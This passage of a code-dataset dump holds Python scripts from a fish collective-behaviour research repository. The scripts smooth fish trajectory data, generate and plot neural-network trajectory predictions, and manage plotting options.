"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport argparse\nimport glob\nimport numpy as np\n\nfrom find.utils.features import Velocities\nfrom find.utils.utils import ExperimentInfo, Center, Normalize\n\n\ndef exp_filter(signal, alpha):\n \"\"\"\n :brief: smooths a signal using an exponential function\n\n :param signal: np.array that represents a signal\n :param alpha: float exponent for the smoothing function\n :return: np.array of the smoothed signal values\n \"\"\"\n filtered_signal = []\n for n in range(signal.shape[1]):\n sig = signal[:, n]\n filtered_sig = [sig[0]]\n # y(k) = y(k-1) + (1-a)*( x(k) - y(k-1) )\n for m in range(1, sig.shape[0]):\n filtered_sig.append(\n filtered_sig[-1] + (1 - alpha) * (sig[m] - filtered_sig[-1]))\n filtered_signal.append(filtered_sig)\n return np.transpose(np.array(filtered_signal))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Exponential smoothing for the fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--fps', type=int,\n help='Camera framerate',\n required=True)\n parser.add_argument('--centroids', '-c', type=int,\n help='Frames to use in order to compute the centroidal positions',\n required=True)\n parser.add_argument('--alpha', '-a', type=float,\n default=0.1,\n help='Smoothing factor',\n required=False)\n parser.add_argument('--alpha_velocity', type=float,\n default=0.1,\n help='Smoothing factor',\n required=False)\n parser.add_argument('--center', action='store_true',\n help='Center smoothed data')\n parser.add_argument('--norm', action='store_true',\n help='Normalize smoothed data')\n args = parser.parse_args()\n\n timestep = args.centroids / args.fps\n\n files = glob.glob(args.path + '/*processed_positions.dat')\n data = []\n for f in files:\n positions = np.loadtxt(f)\n data.append(exp_filter(positions, args.alpha))\n\n info = ExperimentInfo(data)\n if args.center:\n data, info = Center(data, info).get()\n if args.norm:\n data, info = Normalize(data, info).get()\n velocities = Velocities(data, timestep).get()\n\n for i, f in enumerate(files):\n f = files[i]\n new_f = f.replace('positions.dat', 'positions_filtered.dat', 1)\n np.savetxt(new_f, data[i])\n new_f = f.replace('positions.dat', 'velocities_filtered.dat', 1)\n np.savetxt(new_f, velocities[i])\n new_f = f.replace('positions.dat', 'velocities_filtered_twice.dat', 1)\n np.savetxt(new_f, exp_filter(velocities[i], args.alpha_velocity))\n"
},
{
"alpha_fraction": 0.5027417540550232,
"alphanum_fraction": 0.5251246094703674,
"avg_line_length": 37.13688278198242,
"blob_id": "70032ab3f07c1b2a66f29aa0dfdedce78ee9e828",
"content_id": "272b2d6cc2290ba017e63c0be1d2be4e1ff791cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20060,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 526,
"path": "/find/plots/nn/trajectory_prediction.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom cProfile import label\nimport os\nimport glob\nimport argparse\nfrom tqdm import tqdm\nfrom copy import copy\n\nimport colorsys\nimport matplotlib\nimport matplotlib.colors as mc\nimport matplotlib.lines as mlines\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nimport find.plots as fp\nfrom find.plots.common import *\nfrom find.utils.features import Velocities\nfrom find.models.storage import ModelStorage\nfrom find.simulation.fish_simulation import FishSimulation\nfrom find.simulation.simulation_factory import available_functors, SimulationFactory\nfrom find.simulation.tf_nn_functors import get_most_influential_individual\nfrom find.plots.spatial.grid_occupancy import construct_grid\n\nfrom PIL import Image\n\noc = mpl.path.Path([(0, 0), (1, 0)])\n\nhandles_a = [\n mlines.Line2D([0], [0], color='black', marker=oc,\n markersize=6, label='Median'),\n mlines.Line2D([], [], linestyle='none', color='black', marker='H',\n markersize=4, label='Mean'),\n # mlines.Line2D([], [], linestyle='none', markeredgewidth=1, marker='o',\n # color='black', markeredgecolor='w', markerfacecolor='black', alpha=0.6,\n # markersize=5, label='Sample'),\n # mlines.Line2D([], [], linestyle='none', markeredgewidth=0, marker='*',\n # color='black', markeredgecolor='w', markerfacecolor='black',\n # markersize=6, label='Statistical significance'),\n]\n\n\ndef simulate(data, model, args):\n simu_factory = SimulationFactory()\n simu = simu_factory(\n data, model, args.nn_functor, args.backend, args)\n if simu is None:\n import warnings\n warnings.warn('Skipping small simulation')\n return False, None\n if args.backend == 'keras':\n means = np.empty([0, 4])\n stds = np.empty([0, 4])\n for i in range(simu.get_num_iterations()):\n simu.spin_once()\n simu.dump()\n inds = simu.get_individuals()\n m = np.hstack([*inds[0].get_functor().get_means()]).reshape(1, -1)\n means = np.vstack([means, m])\n s = np.hstack([*inds[0].get_functor().get_stds()]).reshape(1, -1)\n stds = np.vstack([stds, s])\n gen_traj = simu.get_stats()[0].get()[args.num_timesteps:, :]\n return True, gen_traj, means, stds\n elif args.backend == 'trajnet':\n simu.spin_once()\n simu.dump()\n inds = simu.get_individuals()\n means = np.hstack([*inds[0].get_functor().get_means()])\n stds = np.hstack([*inds[0].get_functor().get_stds()])\n gen_traj = np.hstack([*inds[0].get_functor().get_full_pred()])\n return True, gen_traj, means, stds\n return False, None, None, None\n\n\ndef generate_traj(exp_files, path, args):\n arg_dict = vars(args)\n arg_dict['iterations'] = args.pred_len\n arg_dict['num_extra_virtu'] = 0\n arg_dict['most_influential_individual'] = 'closest'\n arg_dict['simu_stat_dump_period'] = 1\n arg_dict['distance_inputs'] = True\n arg_dict['stats_enabled'] = True\n args.simu_out_dir = args.path + '/trajectory_pred/' + args.backend\n args.exclude_index = -1\n\n ms = ModelStorage(path=args.path, create_dirs=False)\n model = ms.load_model(args.path + '/model_checkpoint/' +\n args.nn_model_ref, args.backend, args)\n\n skipped_files = 0\n files = glob.glob(args.path + '/' + exp_files['Real'])\n for f in files:\n arg_dict['reference'] = f\n\n trajectories = np.loadtxt(f)\n if args.pred_len + args.num_timesteps > trajectories.shape[0]:\n skipped_files += 1\n continue\n\n iters = trajectories.shape[0] - \\\n (args.pred_len + args.num_timesteps)\n for i in range(iters):\n args.reference = args.reference.replace(\n 'positions', 'positions_{}-{}'.format(args.num_timesteps + i, i + args.num_timesteps + args.pred_len))\n\n ot = trajectories[i:(i + args.pred_len +\n args.num_timesteps), :]\n\n simu_ok = False\n t = ot.copy()\n t[-args.pred_len:, :] = t[args.num_timesteps, :]\n simu_ok, gen_t, means, stds = simulate(t, model, args)\n\n if simu_ok:\n gt_fname = args.reference.replace(\n '.dat', '_gt.dat').replace('raw', 'trajectory_pred/' + args.backend)\n np.savetxt(gt_fname, ot)\n np.savetxt(gt_fname.replace('_gt.dat', '_means.dat'), means)\n np.savetxt(gt_fname.replace('_gt.dat', '_stds.dat'), stds)\n np.savetxt(gt_fname.replace('_gt.dat', '_pred.dat'), gen_t)\n\n diff_1 = np.linalg.norm(\n ot[args.num_timesteps:, :2] - gen_t[:, :2], axis=1)\n diff_2 = np.linalg.norm(\n ot[args.num_timesteps:, 2:] - gen_t[:, 2:], axis=1)\n diff = np.vstack([diff_1, diff_2])\n diff_fname = gt_fname.replace('gt', 'norm')\n np.savetxt(diff_fname, diff.T)\n args.reference = f\n\n\ndef lighten_color(color, amount=0.5):\n try:\n c = mc.cnames[color]\n except:\n c = color\n c = colorsys.rgb_to_hls(*mc.to_rgb(c))\n return colorsys.hls_to_rgb(c[0], 1 - amount * (1 - c[1]), c[2])\n\n\ndef bplot(data, ax, ticks=False):\n paper_rc = {'lines.linewidth': 1, 'lines.markersize': 10}\n sns.set_context(\"paper\", rc=paper_rc)\n\n ax = sns.boxplot(data=data, width=0.25, notch=False,\n saturation=1, linewidth=1.0, ax=ax,\n # whis=[5, 95],\n showfliers=False,\n palette=[\"#ed8b02\", \"#e74c3c\"]\n )\n\n means = []\n stds = []\n for d in data:\n means.append([np.nanmean(list(d))])\n stds.append([np.nanstd(list(d))])\n sns.swarmplot(data=means, palette=['#000000'] * 10,\n marker='H', size=5, ax=ax)\n return means, stds\n\n\ndef create_bplot_grid(data, title, outfile, labels):\n means = []\n stds = []\n\n fig = plt.figure()\n fig.set_figwidth(6)\n fig.set_figheight(3)\n gs0 = fig.add_gridspec(1, 3)\n ax0 = fig.add_subplot(gs0[0])\n ax1 = fig.add_subplot(gs0[1])\n ax2 = fig.add_subplot(gs0[2])\n\n m, s = bplot(data[:2], ax0)\n ax0.set_ylabel(\n 'Trajectory deviation (BL)')\n ax0.set_xlabel('')\n ax0.set_title('0.12 s')\n ax0.set_ylim([0, 1.4])\n ax0.set_xticklabels([])\n ax0.spines['right'].set_color('none')\n means.append(m)\n stds.append(s)\n\n m, s = bplot(data[2:4], ax1)\n ax1.set_ylabel('')\n ax1.set_xlabel('')\n ax1.set_title('0.24 s')\n ax1.set_ylim([0, 1.4])\n ax1.set_yticklabels([])\n ax1.set_xticklabels([])\n ax1.spines['right'].set_color('none')\n ax1.spines['left'].set_color('none')\n means.append(m)\n stds.append(s)\n\n m, s = bplot(data[4:], ax2)\n ax2.set_ylabel('')\n ax2.set_xlabel('')\n ax2.set_title('0.36 s')\n ax2.set_ylim([0, 1.4])\n ax2.set_yticklabels([])\n ax2.set_xticklabels([])\n ax2.spines['left'].set_color('none')\n means.append(m)\n stds.append(s)\n\n ax0.axvline(x=1.5, ymin=0.0, ymax=1.0, color='black')\n ax1.axvline(x=1.5, ymin=0.0, ymax=1.0, color='black')\n\n ax0.legend(handles=handles_a,\n handletextpad=0.5, columnspacing=1,\n loc=\"upper left\", ncol=1, framealpha=0, frameon=False, fontsize=9)\n\n extra = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\n shapeList = [\n Circle((0, 0), radius=1, facecolor='#ed8b02'),\n Circle((0, 0), radius=1, facecolor='#e74c3c'),\n ]\n\n l = fig.legend(shapeList, labels, shadow=True, bbox_to_anchor=(0.5, 0.02),\n handletextpad=0.5, columnspacing=1,\n loc=\"lower center\", ncol=4, frameon=False, fontsize=9)\n\n plt.subplots_adjust(wspace=0, hspace=0)\n # plt.title(title)\n plt.savefig(outfile, dpi=300)\n\n print('{} Means for leaders: {}'.format(title, means))\n print('{} Stds for leaders: {}'.format(title, stds))\n\n\ndef plot_pred_accuracy(traj_path, exp_files, path, args):\n files = glob.glob(traj_path + '**/*_norm.dat')\n\n data = {}\n directories = []\n for f in files:\n directory = f.split('/')[-2]\n norm = (np.loadtxt(f) * args.radius) / args.body_len\n\n if directory not in data.keys():\n directories.append(directory)\n data[directory] = {}\n data[directory]['focal'] = {}\n for i in range(args.pred_len):\n data[directory]['focal'][i] = []\n for j in range(1, norm.shape[1]):\n if 'neigh{}'.format(j) not in data[directory].keys():\n data[directory]['neigh{}'.format(j)] = {}\n data[directory]['neigh{}'.format(j)][i] = []\n\n for m in range(norm.shape[0]):\n data[directory]['focal'][m].append(norm[m, 0])\n for n in range(1, norm.shape[1]):\n data[directory]['neigh{}'.format(n)][m].append(norm[m, n])\n\n focals = []\n neighs = []\n labels_f = []\n labels_n = []\n for m in range(args.pred_len):\n for key in directories:\n focals.append(data[key]['focal'][m])\n labels_f.append('{} step {}'.format(key, m+1))\n for n in range(1, norm.shape[1]):\n neighs.append(data[key]['neigh{}'.format(n)][m])\n labels_n.append('{} step {}'.format(key, m+1))\n\n labels = copy(directories)\n for i in range(len(labels)):\n if labels[i] == 'trajnet':\n labels[i] = 'Social-DLSTM'\n elif labels[i] == 'keras':\n labels[i] = 'HR-NNig'\n\n create_bplot_grid(focals, 'Focal individual predictions',\n traj_path + 'focals.png', labels)\n create_bplot_grid(neighs, 'Neighboring individual predictions',\n traj_path + 'neighs.png', labels)\n\n\ndef fish_image_on_axis(pictures, vel, traj, ax, args):\n phi = np.arctan2(vel[args.num_timesteps-1, 1],\n vel[args.num_timesteps-1, 0]) * 180 / np.pi\n rimage = pictures[0].rotate(phi)\n size = 2.7\n ax.imshow(rimage, extent=[\n traj[args.num_timesteps-1, 0] -\n size, traj[args.num_timesteps-1, 0] + size,\n traj[args.num_timesteps-1, 1] - size, traj[args.num_timesteps-1, 1] + size], aspect='equal', zorder=10)\n\n for n in range(1, traj.shape[1] // 2):\n phi = np.arctan2(vel[args.num_timesteps-1, n * 2 + 1],\n vel[args.num_timesteps-1, n * 2]) * 180 / np.pi\n rimage = pictures[1].rotate(phi)\n ax.imshow(rimage, extent=[\n traj[args.num_timesteps-1, n * 2] -\n size, traj[args.num_timesteps-1, n * 2] + size,\n traj[args.num_timesteps-1, n * 2 + 1] - size, traj[args.num_timesteps-1, n * 2 + 1] + size], aspect='equal', zorder=10)\n\n\ndef plot_fish_pred_cone(traj_path, exp_files, path, args):\n dirs = []\n files = glob.glob(traj_path + '*')\n for f in files:\n if os.path.isdir(f):\n if f.split('/')[-1] != 'skip':\n dirs.append(f.split('/')[-1])\n\n files = glob.glob(traj_path + '{}/*_pred.dat'.format(dirs[0]))\n\n mpath = os.path.dirname(fp.__file__)\n pictures = [Image.open(\n mpath + '/res/fish_red_nicer.png') # .resize((45, 45))\n ,\n Image.open(\n mpath + '/res/fish_blue_nicer.png')\n # .resize((45, 45)),\n ]\n\n data = {}\n for fno, f in enumerate(files):\n gtruth = np.loadtxt(f.replace('_pred.dat', '_gt.dat')) * args.radius\n vel = Velocities([gtruth], args.timestep).get()[0]\n\n abort = False\n data = {}\n for d in dirs:\n fcomp = f.replace(dirs[0], d)\n if not os.path.exists(fcomp):\n abort = True\n break\n\n data[d] = {\n 'pred': np.loadtxt(fcomp) * args.radius,\n 'means': np.loadtxt(fcomp.replace('_pred.dat', '_means.dat')) * args.radius,\n 'stds': np.loadtxt(fcomp.replace('_pred.dat', '_stds.dat')) * args.radius,\n }\n\n if abort:\n continue\n\n fig = plt.figure()\n fig.set_figwidth(6)\n fig.set_figheight(6)\n gs0 = fig.add_gridspec(1, 2)\n gs0.set_width_ratios([2, 1])\n gs1 = gs0[0, 1].subgridspec(2, 1)\n\n ax = fig.add_subplot(gs0[0, 0])\n iax_r = fig.add_subplot(gs1[0, 0])\n iax_l = fig.add_subplot(gs1[1, 0])\n\n # ground truth\n axes = [ax, iax_l, iax_r] # ! this is only limited to 2 models for now\n obs_len = args.num_timesteps\n\n ax = sns.lineplot(x=gtruth[(obs_len-1):, 0], y=gtruth[(obs_len-1):, 1], label='Ground truth (prediction)',\n ax=ax, marker='o', linestyle=':', color='black', zorder=100, markersize=4)\n ax = sns.lineplot(x=gtruth[:obs_len, 0], y=gtruth[:obs_len, 1], label='Ground truth (observation)',\n ax=ax, marker='o', linestyle='--', color='black', zorder=100, markersize=4)\n\n for n in range(1, gtruth.shape[1] // 2):\n ax = sns.lineplot(x=gtruth[(obs_len-1):, n * 2], y=gtruth[(obs_len-1):, n * 2 + 1],\n ax=ax, marker='o', linestyle=':', color='black', zorder=100, markersize=4)\n ax = sns.lineplot(x=gtruth[:obs_len, n * 2], y=gtruth[:obs_len, n * 2 + 1],\n ax=ax, marker='o', linestyle='--', color='black', zorder=100, markersize=4)\n\n # fish images\n for cax in axes:\n fish_image_on_axis(pictures, vel, gtruth, cax, args)\n\n preds = []\n lcolours = sns.color_palette([\"#ed8b02\", \"#e74c3c\"])\n for mnum, (model, meas) in enumerate(data.items()):\n pred = meas['pred']\n means = meas['means']\n stds = meas['stds']\n\n model_label = model\n if model_label == 'keras':\n model_label = 'HR-NNig'\n elif model_label == 'trajnet':\n model_label = 'Social-DLSTM'\n\n xs = []\n ys = []\n for i in range(means.shape[0]):\n xs += np.random.normal(means[i, 0], stds[i, 0], 5000).tolist()\n ys += np.random.normal(means[i, 1], stds[i, 1], 5000).tolist()\n traj = np.array([xs, ys]).T\n\n sub_data = {}\n sub_data[model_label] = [traj]\n x, y, z = construct_grid(sub_data, model_label, args, 10)\n palette = sns.color_palette('viridis', args.grid_bins)\n cmap = ListedColormap(palette)\n c = axes[mnum+1].pcolormesh(x, y, z, cmap=cmap, shading='auto',\n vmin=0.0, vmax=np.max(z), alpha=0.9)\n\n # trajectories\n ax = sns.lineplot(x=pred[:, 0], y=pred[:, 1], label='Prediction ({})'.format(model_label),\n ax=ax, marker='o', linestyle=':', color=lcolours[mnum], zorder=100, markersize=4)\n\n ax = sns.lineplot(x=pred[:, 2], y=pred[:, 3], ax=ax, marker='o',\n linestyle=':', color=lcolours[mnum], zorder=100, markersize=4)\n\n axes[mnum+1] = sns.lineplot(x=pred[:, 0], y=pred[:, 1], ax=axes[mnum+1],\n marker='o', linestyle=':', color=lcolours[mnum], zorder=100, markersize=4)\n\n axes[mnum+1].set_title(model_label)\n preds.append(pred)\n\n # axes\n xys = np.empty((0, 2))\n for n in range(gtruth.shape[1] // 2):\n xys = np.vstack([xys, gtruth[:, (n*2):(n*2+2)]])\n\n for p in preds:\n for n in range(p.shape[1] // 2):\n xys = np.vstack([xys, p[:, (n*2):(n*2+2)]])\n\n mins = np.min(xys, axis=0)\n maxs = np.max(xys, axis=0)\n\n outer = plt.Circle((0, 0), args.radius * 1.0005,\n color='black', fill=False)\n ax.add_artist(outer)\n ax.set_aspect('equal', 'box')\n ax.set_xlabel('x (cm)')\n ax.set_ylabel('y (cm)')\n ax.set_xlim([mins[0] - 2, maxs[0] + 2])\n ax.set_ylim([mins[1] - 2, maxs[1] + 2])\n # sns.set_style(\"whitegrid\", {'axes.grid' : False})\n ax.get_legend().remove()\n ax.tick_params(axis='both', which='major', labelsize=13)\n ax.tick_params(axis='both', which='minor', labelsize=13)\n\n for idx, pred in enumerate(preds):\n xys = np.empty((0, 2))\n xys = np.vstack([xys, gtruth[-args.pred_len-2:, :2]])\n xys = np.vstack([xys, pred[:, :2]])\n mins = np.min(xys, axis=0)\n maxs = np.max(xys, axis=0)\n\n outer = plt.Circle((0, 0), args.radius * 1.0005,\n color='black', fill=False)\n axes[idx+1].add_artist(outer)\n axes[idx+1].set_aspect('equal', 'box')\n axes[idx+1].set_xlim([mins[0] - 1, maxs[0] + 1])\n axes[idx+1].set_ylim([mins[1] - 1, maxs[1] + 1])\n axes[idx+1].set_yticklabels([])\n axes[idx+1].set_xticklabels([])\n\n plt.savefig(traj_path + '{}.png'.format(f.split('/')[-1].replace(\n 'processed_positions', 'trajectory').replace('_pred.dat', '')), dpi=300)\n plt.close()\n\n\ndef plot(exp_files, path, args):\n traj_path = args.path + '/trajectory_pred/'\n if args.force_regenerate or not os.path.isdir(traj_path + args.backend):\n generate_traj(exp_files, path, args)\n\n plot_pred_accuracy(traj_path, exp_files, path, args)\n # plot_fish_pred_cone(traj_path, exp_files, path, args)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot trajectory predictions given a trained model and the ground truth file(s)')\n parser.add_argument('--nn_model_ref',\n type=str,\n help='Model to consider as reference for its parameters',\n default='best_model.h5',\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--radius',\n type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n parser.add_argument('--num_timesteps',\n type=int,\n help='Observation length for the model',\n default=5,\n required=False)\n parser.add_argument('--pred_len',\n type=int,\n help='Prediction length for the model (Depending on the model, multiple single predictions might be made instead)',\n default=1,\n required=False)\n parser.add_argument('--nn_functor',\n default=available_functors()[0],\n choices=available_functors())\n parser.add_argument('--var_coef', type=float,\n help='Prediction variance coefficient',\n default=1.0,\n required=False)\n parser.add_argument('--force_regenerate',\n action='store_true',\n help='Regenerate trajectory predictions',\n default=False,\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5693069100379944,
"alphanum_fraction": 0.5891088843345642,
"avg_line_length": 17.363636016845703,
"blob_id": "5b9a998a6c66901751694958f8d3a67bc45ee6d7",
"content_id": "f335e0114b2941c80932337d156271a6bd84ef6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 202,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 11,
"path": "/find/simulation/simu/example.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom simulation.simulation import Simulation\n\n\nif __name__ == '__main__':\n args = {\n 'stats_enabled': True,\n }\n simu = Simulation(1000, args=args)\n simu.spin()\n"
},
{
"alpha_fraction": 0.46076470613479614,
"alphanum_fraction": 0.46607521176338196,
"avg_line_length": 47.650455474853516,
"blob_id": "b9a22d5eb455740494d12e739e40c5631d54bf64",
"content_id": "0500b93e80b559a3b0e2b56433866a0b7fb55940",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16006,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 329,
"path": "/find/plots/plotter.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport argparse\nfrom tqdm import tqdm\n\nimport find.plots.nn as nn\nimport find.plots.spatial as sp\nimport find.plots.correlation as co\nimport find.plots.trajectory_visualisation as vi\nimport find.plots.dl_si_2021 as dl_si_2021\n\nfrom find.simulation.simulation_factory import available_functors\n\n\ndef plot_selector(key):\n if key in sp.available_plots():\n return sp.get_plot(p), sp.source\n elif key in vi.available_plots():\n return vi.get_plot(p), vi.source\n elif key in nn.available_plots():\n return nn.get_plot(p), nn.source\n elif key in co.available_plots():\n return co.get_plot(p), co.source\n elif key in dl_si_2021.available_plots():\n return dl_si_2021.get_plot(p), dl_si_2021.source\n else:\n assert False\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Plot manager')\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--timestep', '-t',\n type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--timesteps_skip',\n type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n\n # available plots\n plot_list = sp.available_plots() + vi.available_plots() + \\\n co.available_plots() + nn.available_plots() + dl_si_2021.available_plots()\n\n plot_conf = parser.add_argument_group('Plot configuration')\n plot_conf.add_argument('--plot',\n nargs=\"+\",\n default='all_spatial_and_correllation',\n choices=plot_list + ['all_spatial_and_correllation'])\n plot_conf.add_argument('--plot_out_dir', type=str,\n help='Directory for plot output files (always relative to the experiment path)',\n default='plots',\n required=False)\n plot_conf.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid',\n 'Virtual', 'Virtual (Toulouse)'],\n choices=['Real', 'Hybrid',\n 'Virtual', 'Virtual (Toulouse)', 'Virtual (Toulouse cpp)', 'Robot'])\n plot_conf.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n plot_conf.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n plot_conf.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n plot_conf.add_argument('--virtual_toul_files',\n type=str,\n default='generated_toulouse/TRAJTH_*.dat',\n required=False)\n plot_conf.add_argument('--virtual_toul_cpp_files',\n type=str,\n default='generated_toulouse_cpp/positions*.dat',\n required=False)\n plot_conf.add_argument('--robot_files',\n type=str,\n default='robot_raw/*processed_positions.dat',\n required=False)\n plot_conf.add_argument('--num_virtual_samples',\n type=int,\n help='Number of samples to use when computing metrics for the virtual data',\n default=-1,\n required=False)\n\n spatial_options = parser.add_argument_group('Spatial plot options')\n spatial_options.add_argument('--radius', '-r',\n type=float,\n help='Radius',\n default=0.25,\n required=False)\n spatial_options.add_argument('--grid_bins',\n type=int,\n help='Number of bins for the occupancy grid plot',\n default=416,\n required=False)\n spatial_options.add_argument('--grid_smooth',\n action='store_true',\n help='Smooth the grid for visual reasons if true',\n default=False,\n required=False)\n spatial_options.add_argument('--grid_cutoff_thres',\n type=float,\n help='Cutoff point threshold for the percentage of points that are allowed to be removed to not squash the grid drawing colours',\n default=0.05,\n required=False)\n spatial_options.add_argument('--grid_cutoff_val',\n type=float,\n help='Force the cutoff value of the grid for consistency (overrides grid_cutoff_thres)',\n default=-1,\n required=False)\n spatial_options.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=5000,\n required=False)\n spatial_options.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n spatial_options.add_argument('--prediction_len', type=int,\n help='Predictions to plot',\n default=5,\n required=False)\n spatial_options.add_argument('--observation_len', type=int,\n help='Observations to plot',\n default=0,\n required=False)\n spatial_options.add_argument('--radius_grid_res',\n type=int,\n help='Resolution (in m) for the radius of the focal individual in the future trajectory variance plot',\n default=0.025,\n required=False)\n spatial_options.add_argument('--angle_grid_res',\n type=int,\n help='Resolution (in deg) for the angle to the wall of the focal individual future trajectory variance plot',\n default=5,\n required=False)\n spatial_options.add_argument('--interdist_grid_res',\n type=float,\n help='Resolution (in m) for the interinidividual distance in the future trajectory variance plot',\n default=0.025,\n required=False)\n spatial_options.add_argument('--viewing_angle_grid_res',\n type=float,\n help='Resolution (in degr) for the interinidividual distance in the future trajectory variance plot',\n default=45,\n required=False)\n\n cor_plot = parser.add_argument_group('Correlation plot options')\n cor_plot.add_argument('--tcor',\n type=float,\n default=25.0,\n help='Time window to consider when computing correlation metrics',\n required=False)\n cor_plot.add_argument('--ntcor',\n type=int,\n default=1,\n help='Number of timesteps to includ in the correlation metrics computaion',\n required=False)\n\n traj_options = parser.add_argument_group(\n 'Trajectory visualisation plot options')\n traj_options.add_argument('--traj_visualisation_list',\n type=str,\n nargs='+',\n help='List of files to visualise',\n default='random',\n required=False)\n traj_options.add_argument('--open', action='store_true',\n help='Visualize the open setup', default=False)\n traj_options.add_argument('--fish_like', action='store_true',\n help='Images instead of points',\n default=False)\n traj_options.add_argument('--turing', action='store_true',\n help='Same image for all individuals to perform a turing test',\n default=False)\n traj_options.add_argument('--info', action='store_true',\n help='Display info',\n default=False)\n traj_options.add_argument('--dark', action='store_true',\n help='Render dark friendly icons',\n default=False)\n traj_options.add_argument('--exclude_index', '-e', type=int,\n help='Index of the virtual individual',\n required=False,\n default=-1)\n traj_options.add_argument('--range', nargs='+',\n type=int,\n help='Vector containing the start and end index of trajectories to be plotted',\n required=False)\n traj_options.add_argument('--dpi', type=int,\n help='Radius',\n default=300,\n required=False)\n traj_options.add_argument('--tail_period',\n type=float,\n help='Tail frequency to change the image of the fish (only used in fish_like)',\n default=0.5,\n required=False)\n traj_options.add_argument('--fill_between', type=int,\n help='Fill frames between timesteps',\n default=0,\n required=False)\n traj_options.add_argument('--body_len', type=float,\n help='Body length of the individuals (for fish)',\n default=0.035,\n required=False)\n\n nn_options = parser.add_argument_group(\n 'NN training history visualisation optioins')\n nn_options.add_argument('--nn_compare_dirs',\n type=str,\n nargs='+',\n help='List of directories to look through and analyse',\n required=False)\n nn_options.add_argument('--nn_compare_out_dir',\n type=str,\n help='Directory to output NN analysis results',\n default='nn_comparison',\n required=False)\n nn_options.add_argument('--nn_delimiter',\n type=str,\n help='Delimiter used in the log files',\n default=',',\n required=False)\n nn_options.add_argument('--nn_last_epoch',\n type=int,\n help='Plot up to nn_last_epoch data points. -1 stands for all, -2 stands for up to the min of iterations across the experiments',\n default=-1,\n required=False)\n nn_options.add_argument('--nn_num_legend_parents',\n type=int,\n help='Number of parent directories to show in the legend',\n default=1,\n required=False)\n nn_options.add_argument('--nn_num_sample_epochs',\n type=int,\n help='Number of samples to plot. -1 will consider all available points',\n default=-1,\n required=False)\n nn_options.add_argument('--nn_model_ref',\n type=str,\n help='Model to consider as reference for its parameters',\n default='best_model.h5',\n required=False)\n nn_options.add_argument('--backend',\n help='Backend selection',\n default='keras',\n choices=['keras', 'trajnet'])\n nn_options.add_argument('--num_timesteps',\n type=int,\n help='Observation length for the model',\n default=5,\n required=False)\n nn_options.add_argument('--pred_len',\n type=int,\n help='Prediction length for the model (Depending on the model, multiple single predictions might be made instead)',\n default=1,\n required=False)\n nn_options.add_argument('--nn_functor',\n default=available_functors()[0],\n choices=available_functors())\n nn_options.add_argument('--var_coef', type=float,\n help='Prediction variance coefficient',\n default=1.0,\n required=False)\n nn_options.add_argument('--force_regenerate',\n action='store_true',\n help='Regenerate trajectory predictions',\n default=False,\n required=False)\n args = parser.parse_args()\n args.timestep = args.timestep * (args.timesteps_skip + 1)\n args.plot_out_dir = args.path + '/' + args.plot_out_dir\n\n if args.plot == 'all_spatial_and_correllation':\n args.plot = sp.available_plots() + co.available_plots()\n\n if args.plot == 'all_spatial':\n args.plot = sp.available_plots()\n\n if args.plot == 'all_correlation':\n args.plot = co.available_plots()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n elif t == 'Virtual (Toulouse)':\n exp_files[t] = args.virtual_toul_files\n elif t == 'Virtual (Toulouse cpp)':\n exp_files[t] = args.virtual_toul_cpp_files\n elif t == 'Robot':\n exp_files[t] = args.robot_files\n\n if not os.path.exists(args.plot_out_dir):\n os.makedirs(args.plot_out_dir)\n\n for p in tqdm(args.plot, desc='Plotting the selected quantities ({})'.format(len(args.plot))):\n pfunc, ptype = plot_selector(p)\n\n if ptype == 'nn':\n outpath = args.nn_compare_out_dir\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n else:\n outpath = args.plot_out_dir + '/' + ptype + '/'\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n\n pfunc(exp_files, outpath, args)\n"
},
{
